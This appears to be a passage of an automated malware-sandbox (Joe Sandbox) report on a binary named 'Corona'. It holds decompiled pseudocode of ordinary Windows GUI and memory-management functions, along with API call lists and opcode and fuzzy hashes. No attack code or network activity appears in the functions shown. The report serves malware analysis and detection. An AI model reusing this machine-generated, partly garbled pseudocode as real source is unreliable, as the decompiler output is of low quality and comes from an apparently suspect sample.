                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: 739414$7345173941500AddressHandleModuleProc
                                  • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                  • API String ID: 978676473-3125200627
                                  • Opcode ID: eb834de5698537f9b18cef4fc3382d38dddbd2bcb8729810cf576a2d9bfc5b91
                                  • Instruction ID: e9a318a36f5c64a228ff2c05a5c829af884a116d31c0a476508e0499b644eb5d
                                  • Opcode Fuzzy Hash: eb834de5698537f9b18cef4fc3382d38dddbd2bcb8729810cf576a2d9bfc5b91
                                  • Instruction Fuzzy Hash: 9721AE70600300ABDB10EF369D87B2A37A8DB59705F10A13BF805E72A2DB79ED408B5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E00423B80(intOrPtr _a4, intOrPtr* _a8) {
                                  				void _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t23;
                                  				int _t24;
                                  				intOrPtr _t26;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t29;
                                  				intOrPtr* _t31;
                                  
                                  				_t29 = _a8;
                                  				_t27 = _a4;
                                  				if( *0x452925 != 0) {
                                  					_t24 = 0;
                                  					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                  						 *((intOrPtr*)(_t29 + 4)) = 0;
                                  						 *((intOrPtr*)(_t29 + 8)) = 0;
                                  						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                  						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t31 = _t29;
                                  						 *(_t31 + 0x24) = 1;
                                  						if( *_t31 >= 0x4c) {
                                  							_push("DISPLAY");
                                  							_push(_t31 + 0x28);
                                  							L00405FF4();
                                  						}
                                  						_t24 = 1;
                                  					}
                                  				} else {
                                  					_t26 =  *0x45290c; // 0x423b80
                                  					 *0x45290c = E0042377C(5, _t23, _t26, _t27, _t29);
                                  					_t24 =  *0x45290c(_t27, _t29);
                                  				}
                                  				return _t24;
                                  			}















                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423BD8
                                  • GetSystemMetrics.USER32 ref: 00423BED
                                  • GetSystemMetrics.USER32 ref: 00423BF8
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 00423C22
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfoA
                                  • API String ID: 2545840971-1370492664
                                  • Opcode ID: 6c3827def660ae31f0c5105d1d2decd2efbb0088633e3b186f1bc6ebbd155225
                                  • Instruction ID: 43870788231af9d03fcff2d7efea263e342a83579d947105252d570e007e8cee
                                  • Opcode Fuzzy Hash: 6c3827def660ae31f0c5105d1d2decd2efbb0088633e3b186f1bc6ebbd155225
                                  • Instruction Fuzzy Hash: E611E4727013159FD720CF62AC447A7B7F8EB0A712F40892BED45A7351D7B9A9408BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E004206B8(int __eax, void* __ecx, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				struct HDC__* _v16;
                                  				void* _v20;
                                  				struct tagRGBQUAD _v1044;
                                  				int _t16;
                                  				struct HDC__* _t18;
                                  				int _t31;
                                  				int _t34;
                                  				intOrPtr _t41;
                                  				void* _t43;
                                  				void* _t46;
                                  				void* _t48;
                                  				intOrPtr _t49;
                                  
                                  				_t16 = __eax;
                                  				_t46 = _t48;
                                  				_t49 = _t48 + 0xfffffbf0;
                                  				_v8 = __edx;
                                  				_t43 = __eax;
                                  				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                                  					L4:
                                  					return _t16;
                                  				} else {
                                  					_t16 = E0041DE58(_v8, 0xff,  &_v1044);
                                  					_t34 = _t16;
                                  					if(_t34 == 0) {
                                  						goto L4;
                                  					} else {
                                  						_push(0);
                                  						L0040638C();
                                  						_v12 = _t16;
                                  						_t18 = _v12;
                                  						_push(_t18);
                                  						L0040603C();
                                  						_v16 = _t18;
                                  						_v20 = SelectObject(_v16, _t43);
                                  						_push(_t46);
                                  						_push(0x420767);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t49;
                                  						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
                                  						_pop(_t41);
                                  						 *[fs:eax] = _t41;
                                  						_push(0x42076e);
                                  						SelectObject(_v16, _v20);
                                  						DeleteDC(_v16);
                                  						_t31 = _v12;
                                  						_push(_t31);
                                  						_push(0);
                                  						L004065C4();
                                  						return _t31;
                                  					}
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 0041DE58: GetObjectA.GDI32(?,00000004), ref: 0041DE6F
                                    • Part of subcall function 0041DE58: 72E7AEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,004206EE), ref: 0041DE92
                                  • 72E7AC50.USER32(00000000), ref: 004206F6
                                  • 72E7A590.GDI32(?,00000000), ref: 00420702
                                  • SelectObject.GDI32(?), ref: 0042070F
                                  • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00420767,?,?,?,?,00000000), ref: 00420733
                                  • SelectObject.GDI32(?,?), ref: 0042074D
                                  • DeleteDC.GDI32(?), ref: 00420756
                                  • 72E7B380.USER32(00000000,?,?,?,?,0042076E,?,00000000,00420767,?,?,?,?,00000000), ref: 00420761
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Object$Select$A590B380ColorDeleteTable
                                  • String ID:
                                  • API String ID: 980243606-0
                                  • Opcode ID: 293ab1f444f3af5487f18a5b7d9288eebc8dd0e8d6b2bd1ca266f63037e0c205
                                  • Instruction ID: a017874a5c4c1e7bd90330ea7e1f06b663e69c48fe53f10130404cce1f0c5833
                                  • Opcode Fuzzy Hash: 293ab1f444f3af5487f18a5b7d9288eebc8dd0e8d6b2bd1ca266f63037e0c205
                                  • Instruction Fuzzy Hash: CA115471E00318AFDB10EBE9DC51EAEB3FCEB48704F4144AAB505E7281D6799D508B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0044BD10(long __eax, void* __ecx, short __edx) {
                                  				struct tagPOINT _v24;
                                  				long _t7;
                                  				long _t12;
                                  				long _t19;
                                  				void* _t21;
                                  				struct HWND__* _t27;
                                  				short _t28;
                                  				void* _t30;
                                  				struct tagPOINT* _t31;
                                  
                                  				_t21 = __ecx;
                                  				_t7 = __eax;
                                  				_t31 = _t30 + 0xfffffff8;
                                  				_t28 = __edx;
                                  				_t19 = __eax;
                                  				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
                                  					L6:
                                  					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
                                  				} else {
                                  					 *((short*)(__eax + 0x44)) = __edx;
                                  					if(__edx != 0) {
                                  						L5:
                                  						_t7 = SetCursor(E0044BCE8(_t19, _t28));
                                  						goto L6;
                                  					} else {
                                  						GetCursorPos(_t31);
                                  						_push(_v24.y);
                                  						_t27 = WindowFromPoint(_v24);
                                  						if(_t27 == 0) {
                                  							goto L5;
                                  						} else {
                                  							_t12 = GetWindowThreadProcessId(_t27, 0);
                                  							if(_t12 != GetCurrentThreadId()) {
                                  								goto L5;
                                  							} else {
                                  								_t7 = SendMessageA(_t27, 0x20, _t27, E004066FC(SendMessageA(_t27, 0x84, 0, E00406774(_t31, _t21)), 0x200));
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t7;
                                  			}

                                  APIs
                                  • GetCursorPos.USER32 ref: 0044BD2B
                                  • WindowFromPoint.USER32(?,?), ref: 0044BD38
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0044BD46
                                  • GetCurrentThreadId.KERNEL32 ref: 0044BD4D
                                  • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0044BD66
                                  • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 0044BD7D
                                  • SetCursor.USER32(00000000), ref: 0044BD8F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                  • String ID:
                                  • API String ID: 1770779139-0
                                  • Opcode ID: 0fde572dc7bd514bfb24d7e8d55c711b9f5b90b1065fa8b67d8fa167bd07cd70
                                  • Instruction ID: c4255c0a7a29947a3f7894671162d43242d64d0068fab69f319d93a70231aa58
                                  • Opcode Fuzzy Hash: 0fde572dc7bd514bfb24d7e8d55c711b9f5b90b1065fa8b67d8fa167bd07cd70
                                  • Instruction Fuzzy Hash: 0101886220064035EA2437794C86F7F2568DB81759F11057FB915BA1C3EA3ECC1096AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00447864(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				intOrPtr* _v12;
                                  				struct HDC__* _v16;
                                  				struct tagPAINTSTRUCT _v80;
                                  				struct tagRECT _v96;
                                  				struct tagRECT _v112;
                                  				signed int _v116;
                                  				long _v120;
                                  				void* __ebp;
                                  				void* _t68;
                                  				void* _t94;
                                  				struct HBRUSH__* _t97;
                                  				intOrPtr _t105;
                                  				void* _t118;
                                  				void* _t127;
                                  				intOrPtr _t140;
                                  				intOrPtr _t146;
                                  				void* _t147;
                                  				void* _t148;
                                  				void* _t150;
                                  				void* _t152;
                                  				intOrPtr _t153;
                                  
                                  				_t148 = __esi;
                                  				_t147 = __edi;
                                  				_t138 = __edx;
                                  				_t127 = __ebx;
                                  				_t150 = _t152;
                                  				_t153 = _t152 + 0xffffff8c;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t68 =  *_v12 - 0xf;
                                  				if(_t68 == 0) {
                                  					_v16 =  *(_v12 + 4);
                                  					if(_v16 == 0) {
                                  						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
                                  					}
                                  					_push(_t150);
                                  					_push(0x447a32);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t153;
                                  					if(_v16 == 0) {
                                  						GetWindowRect( *(_v8 + 0x254),  &_v96);
                                  						E0042E338(_v8,  &_v120,  &_v96);
                                  						_v96.left = _v120;
                                  						_v96.top = _v116;
                                  						E0042D130( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
                                  					}
                                  					E00432BA8(_v8, _t127, _v12, _t147, _t148);
                                  					_pop(_t140);
                                  					 *[fs:eax] = _t140;
                                  					_push(0x447a40);
                                  					if(_v16 == 0) {
                                  						return EndPaint( *(_v8 + 0x254),  &_v80);
                                  					}
                                  					return 0;
                                  				} else {
                                  					_t94 = _t68 - 5;
                                  					if(_t94 == 0) {
                                  						_t97 = E0041CC2C( *((intOrPtr*)(_v8 + 0x170)));
                                  						 *((intOrPtr*)( *_v8 + 0x44))();
                                  						FillRect( *(_v12 + 4),  &_v112, _t97);
                                  						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
                                  							GetClientRect( *(_v8 + 0x254),  &_v96);
                                  							FillRect( *(_v12 + 4),  &_v96, E0041CC2C( *((intOrPtr*)(_v8 + 0x170))));
                                  						}
                                  						_t105 = _v12;
                                  						 *((intOrPtr*)(_t105 + 0xc)) = 1;
                                  					} else {
                                  						_t118 = _t94 - 0x2b;
                                  						if(_t118 == 0) {
                                  							E004477D8(_t150);
                                  							_t105 = _v8;
                                  							if( *((char*)(_t105 + 0x22f)) == 2) {
                                  								if(E00447D00(_v8) == 0 || E00447824(_t138, _t150) == 0) {
                                  									_t146 = 1;
                                  								} else {
                                  									_t146 = 0;
                                  								}
                                  								_t105 = E00444B44( *(_v8 + 0x254), _t146);
                                  							}
                                  						} else {
                                  							if(_t118 != 0x45) {
                                  								_t105 = E004477D8(_t150);
                                  							} else {
                                  								E004477D8(_t150);
                                  								_t105 = _v12;
                                  								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
                                  									_t105 = _v12;
                                  									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					return _t105;
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                  • String ID:
                                  • API String ID: 901200654-0
                                  • Opcode ID: 22ceeaf33f644c6fa7c81e48bf9621237c13f35976eec21b1eb32dd00c2e106f
                                  • Instruction ID: 8971948cc4d806393b0500a7b3897a3fb005e959a782c2334ea829d098770f3e
                                  • Opcode Fuzzy Hash: 22ceeaf33f644c6fa7c81e48bf9621237c13f35976eec21b1eb32dd00c2e106f
                                  • Instruction Fuzzy Hash: 41511D74A04108EFDB00DFA9C589E9EB7F8AF08314F5581A6E405EB352D738AE46DF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0041E104(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				signed int _v24;
                                  				signed int _v32;
                                  				signed short _v44;
                                  				int _t36;
                                  				signed int _t37;
                                  				signed short _t38;
                                  				signed int _t39;
                                  				signed short _t43;
                                  				signed int* _t47;
                                  				signed int _t51;
                                  				intOrPtr _t61;
                                  				void* _t67;
                                  				void* _t68;
                                  				void* _t69;
                                  				intOrPtr _t70;
                                  
                                  				_t68 = _t69;
                                  				_t70 = _t69 + 0xffffff90;
                                  				_v16 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t47 = _a8;
                                  				_v24 = _v16 << 4;
                                  				_v20 = E004078A0(_v24, __eflags);
                                  				 *[fs:edx] = _t70;
                                  				_t51 = _v24;
                                  				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x41e3fb, _t68, __edi, __esi, __ebx, _t67);
                                  				if(( *_t47 | _t47[1]) != 0) {
                                  					_t36 = _a4;
                                  					 *_t36 =  *_t47;
                                  					 *(_t36 + 4) = _t47[1];
                                  				} else {
                                  					 *_a4 = GetSystemMetrics(0xb);
                                  					_t36 = GetSystemMetrics(0xc);
                                  					 *(_a4 + 4) = _t36;
                                  				}
                                  				_push(0);
                                  				L0040638C();
                                  				_v44 = _t36;
                                  				if(_v44 == 0) {
                                  					E0041D5C8(_t51);
                                  				}
                                  				_push(_t68);
                                  				_push(0x41e1ed);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t70;
                                  				_push(0xe);
                                  				_t37 = _v44;
                                  				_push(_t37);
                                  				L004060D4();
                                  				_push(0xc);
                                  				_t38 = _v44;
                                  				_push(_t38);
                                  				L004060D4();
                                  				_t39 = _t37 * _t38;
                                  				if(_t39 <= 8) {
                                  					__eflags = 1;
                                  					_v32 = 1 << _t39;
                                  				} else {
                                  					_v32 = 0x7fffffff;
                                  				}
                                  				_pop(_t61);
                                  				 *[fs:eax] = _t61;
                                  				_push(E0041E1F4);
                                  				_t43 = _v44;
                                  				_push(_t43);
                                  				_push(0);
                                  				L004065C4();
                                  				return _t43;
                                  			}

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0041E152
                                  • GetSystemMetrics.USER32 ref: 0041E15E
                                  • 72E7AC50.USER32(00000000), ref: 0041E17A
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0041E1ED,?,00000000), ref: 0041E1A1
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041E1ED,?,00000000), ref: 0041E1AE
                                  • 72E7B380.USER32(00000000,00000000,0041E1F4,0000000E,00000000,0041E1ED,?,00000000), ref: 0041E1E7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$B380
                                  • String ID:
                                  • API String ID: 3145338429-0
                                  • Opcode ID: ced4139a3b48ac1bab229ba180c4525aa6dc2c949b7a5ea856ff5f0b05076801
                                  • Instruction ID: d60c1852d40d5350a87500709d2e6a49ab3bfc6eca5313e77627c143b7621f43
                                  • Opcode Fuzzy Hash: ced4139a3b48ac1bab229ba180c4525aa6dc2c949b7a5ea856ff5f0b05076801
                                  • Instruction Fuzzy Hash: 02314374A00204EFEB00DF66C881ADEBBF5FB49710F118566F915AB381C6789D41CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 45%
                                  			E0041E574(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                  				char _v5;
                                  				struct HDC__* _v12;
                                  				struct HDC__* _v16;
                                  				struct HDC__* _t29;
                                  				struct tagBITMAPINFO* _t32;
                                  				intOrPtr _t39;
                                  				struct HBITMAP__* _t43;
                                  				void* _t46;
                                  
                                  				_t32 = __ecx;
                                  				_t43 = __eax;
                                  				E0041E424(__eax, _a4, __ecx);
                                  				_v12 = 0;
                                  				_push(0);
                                  				L0040603C();
                                  				_v16 = 0;
                                  				_push(_t46);
                                  				_push(0x41e611);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t46 + 0xfffffff4;
                                  				if(__edx != 0) {
                                  					_push(0);
                                  					_push(__edx);
                                  					_t29 = _v16;
                                  					_push(_t29);
                                  					L0040619C();
                                  					_v12 = _t29;
                                  					_push(_v16);
                                  					L0040616C();
                                  				}
                                  				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
                                  				_pop(_t39);
                                  				 *[fs:eax] = _t39;
                                  				_push(0x41e618);
                                  				if(_v12 != 0) {
                                  					_push(0);
                                  					_push(_v12);
                                  					_push(_v16);
                                  					L0040619C();
                                  				}
                                  				return DeleteDC(_v16);
                                  			}












                                  APIs
                                    • Part of subcall function 0041E424: GetObjectA.GDI32(?,00000054), ref: 0041E438
                                  • 72E7A590.GDI32(00000000), ref: 0041E596
                                  • 72E7B410.GDI32(?,?,00000000,00000000,0041E611,?,00000000), ref: 0041E5B7
                                  • 72E7B150.GDI32(?,?,?,00000000,00000000,0041E611,?,00000000), ref: 0041E5C3
                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041E5DA
                                  • 72E7B410.GDI32(?,00000000,00000000,0041E618,?,00000000), ref: 0041E602
                                  • DeleteDC.GDI32(?), ref: 0041E60B
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: B410$A590B150BitsDeleteObject
                                  • String ID:
                                  • API String ID: 3837315262-0
                                  • Opcode ID: b70a1ced80fcf729e647f38ab0b64e788c29f3460074b455ae73bd8ab028e24f
                                  • Instruction ID: 098dd08112c77945fff4872e51cc9bd5b70d39cc5584085f1824174f218af38d
                                  • Opcode Fuzzy Hash: b70a1ced80fcf729e647f38ab0b64e788c29f3460074b455ae73bd8ab028e24f
                                  • Instruction Fuzzy Hash: 3C119475E00204BFEB10DBAACC41F9EB7FCEF49710F514466B914E7281D679A9508768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00401AC0() {
                                  				void* _t2;
                                  				void* _t3;
                                  				void* _t14;
                                  				intOrPtr* _t19;
                                  				intOrPtr _t23;
                                  				intOrPtr _t26;
                                  				intOrPtr _t28;
                                  
                                  				_t26 = _t28;
                                  				if( *0x4525c0 == 0) {
                                  					return _t2;
                                  				} else {
                                  					_push(_t26);
                                  					_push(E00401B96);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t28;
                                  					if( *0x452049 != 0) {
                                  						_push(0x4525c8);
                                  						L00401358();
                                  					}
                                  					 *0x4525c0 = 0;
                                  					_t3 =  *0x452620; // 0x5bca20
                                  					LocalFree(_t3);
                                  					 *0x452620 = 0;
                                  					_t19 =  *0x4525e8; // 0x5ba96c
                                  					while(_t19 != 0x4525e8) {
                                  						VirtualFree( *(_t19 + 8), 0, 0x8000);
                                  						_t19 =  *_t19;
                                  					}
                                  					E004013C0(0x4525e8);
                                  					E004013C0(0x4525f8);
                                  					E004013C0(0x452624);
                                  					_t14 =  *0x4525e0; // 0x5ba338
                                  					while(_t14 != 0) {
                                  						 *0x4525e0 =  *_t14;
                                  						LocalFree(_t14);
                                  						_t14 =  *0x4525e0; // 0x5ba338
                                  					}
                                  					_pop(_t23);
                                  					 *[fs:eax] = _t23;
                                  					_push(0x401b9d);
                                  					if( *0x452049 != 0) {
                                  						_push(0x4525c8);
                                  						L00401360();
                                  					}
                                  					_push(0x4525c8);
                                  					L00401368();
                                  					return 0;
                                  				}
                                  			}











                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(004525C8,00000000,00401B96), ref: 00401AED
                                  • LocalFree.KERNEL32(005BCA20,00000000,00401B96), ref: 00401AFF
                                  • VirtualFree.KERNEL32(?,00000000,00008000,005BCA20,00000000,00401B96), ref: 00401B1E
                                  • LocalFree.KERNEL32(005BA338,?,00000000,00008000,005BCA20,00000000,00401B96), ref: 00401B5D
                                  • RtlLeaveCriticalSection.KERNEL32(004525C8,00401B9D,005BCA20,00000000,00401B96), ref: 00401B86
                                  • RtlDeleteCriticalSection.KERNEL32(004525C8,00401B9D,005BCA20,00000000,00401B96), ref: 00401B90
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                  • String ID:
                                  • API String ID: 3782394904-0
                                  • Opcode ID: bb85964cfbc20ae3488e472ef02cc62e6f756c390864ca4dab8b7814003cca96
                                  • Instruction ID: 960d2cca53614bd8d337a069f5bbc476030b35e8722ed236f2fd793f7ecd5be6
                                  • Opcode Fuzzy Hash: bb85964cfbc20ae3488e472ef02cc62e6f756c390864ca4dab8b7814003cca96
                                  • Instruction Fuzzy Hash: 7D1181706007486AE715AB659EA5B1A37E4A747705F5040BBF800B66F3F7BCE844C72C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042B5E8(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				char _v8;
                                  				void* _t20;
                                  				void* _t21;
                                  				void* _t27;
                                  				void* _t31;
                                  				void* _t35;
                                  				intOrPtr* _t43;
                                  
                                  				_t43 =  &_v8;
                                  				_t20 =  *0x4509d4; // 0x0
                                  				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
                                  				_t21 =  *0x4509d4; // 0x0
                                  				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
                                  				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                  					SetWindowLongA(_a4, 0xfffffff4, _a4);
                                  				}
                                  				_t27 =  *0x4509d4; // 0x0
                                  				SetPropA(_a4,  *0x452b1e & 0x0000ffff, _t27);
                                  				_t31 =  *0x4509d4; // 0x0
                                  				SetPropA(_a4,  *0x452b1c & 0x0000ffff, _t31);
                                  				_t35 =  *0x4509d4; // 0x0
                                  				 *0x4509d4 = 0;
                                  				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
                                  				return  *_t43;
                                  			}











                                  APIs
                                  • SetWindowLongA.USER32 ref: 0042B610
                                  • GetWindowLongA.USER32 ref: 0042B61B
                                  • GetWindowLongA.USER32 ref: 0042B62D
                                  • SetWindowLongA.USER32 ref: 0042B640
                                  • SetPropA.USER32(?,00000000,00000000), ref: 0042B657
                                  • SetPropA.USER32(?,00000000,00000000), ref: 0042B66E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: LongWindow$Prop
                                  • String ID:
                                  • API String ID: 3887896539-0
                                  • Opcode ID: 1fc2afac5e52ccdc58abee8b739a76f62d9f5c348bbc83186e4914bfd283a1f8
